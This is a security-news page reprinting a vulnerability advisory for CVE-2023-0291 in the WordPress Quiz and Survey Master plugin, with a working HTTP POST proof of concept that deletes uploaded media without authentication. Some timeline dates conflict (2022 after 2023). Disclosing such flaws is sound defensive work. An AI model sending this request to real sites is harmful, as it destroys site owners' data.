Security
Headlines
HeadlinesLatestCVEs

Headline

WordPress Quiz And Survey Master 8.0.8 Media Deletion

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a missing authentication vulnerability that allows an attacker to delete media from the WordPress instance.

Packet Storm
#vulnerability#web#git#wordpress#php#acer#auth

RCE Security Advisory
https://www.rcesecurity.com

  1. ADVISORY INFORMATION
    =======================
    Product: Quiz And Survey Master
    Vendor URL: https://wordpress.org/plugins/quiz-master-next/
    Type: Missing Authentication for Critical Function [CWE-306]
    Date found: 2023-01-13
    Date published: 2023-02-08
    CVSSv3 Score: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
    CVE: CVE-2023-0291

  2. CREDITS
    ==========
    This vulnerability was discovered and researched by Julien Ahrens from
    RCE Security.

  3. VERSIONS AFFECTED
    ====================
    Quiz And Survey Master 8.0.8 and below

  4. INTRODUCTION
    ===============
    Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used
    to create engaging content to drive traffic and increase user engagement.
    Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee
    surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor’s homepage)

  1. VULNERABILITY DETAILS
    ========================
    The plugin offers the ajax action “qsm_remove_file_fd_question” to unauthenticated
    users which accepts a “media_id” parameter pointing to a any item uploaded through
    WordPress’ media upload functionality. However, this “media_id” is afterward used
    in a forced wp_delete_attachment() call ultimately deleteing the media from the
    WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)
uploaded WordPress media files.

  1. PROOF OF CONCEPT
    ===================
    The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1

  1. SOLUTION
    ===========
    Update to version 8.0.9

  2. REPORT TIMELINE
    ==================
    2023-01-13: Discovery of the vulnerability
    2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291
    2023-01-18: Sent initial notification to vendor via contact form
    2022-01-18: Vendor response
    2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability
    2022-02-08: Public disclosure

  3. REFERENCES
    =============
    https://github.com/MrTuxracer/advisories


Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens
Freelancer | Penetration Tester

RCE Security
VAT-ID: DE328576638
Website: www.rcesecurity.com

This e-mail may contain confidential and/or privileged information.
If you are not the intended recipient (or have received this e-mail in
error) please notify the sender immediately and destroy this e-mail.
Any unauthorized copying, disclosure or distribution of the material
in this e-mail is strictly forbidden.

Related news

CVE-2023-0291: WordPress Quiz And Survey Master 8.0.8 Cross Site Request Forgery ≈ Packet Storm

The Quiz And Survey Master for WordPress is vulnerable to authorization bypass due to a missing capability check on the function associated with the qsm_remove_file_fd_question AJAX action in versions up to, and including, 8.0.8. This makes it possible for unauthenticated attackers to delete arbitrary media files.

WordPress Quiz And Survey Master 8.0.8 Cross Site Request Forgery

WordPress Quiz and Survey Master plugin versions 8.0.8 and below suffer from a cross site request forgery vulnerability.

Packet Storm: Latest News

Ubuntu Security Notice USN-7027-1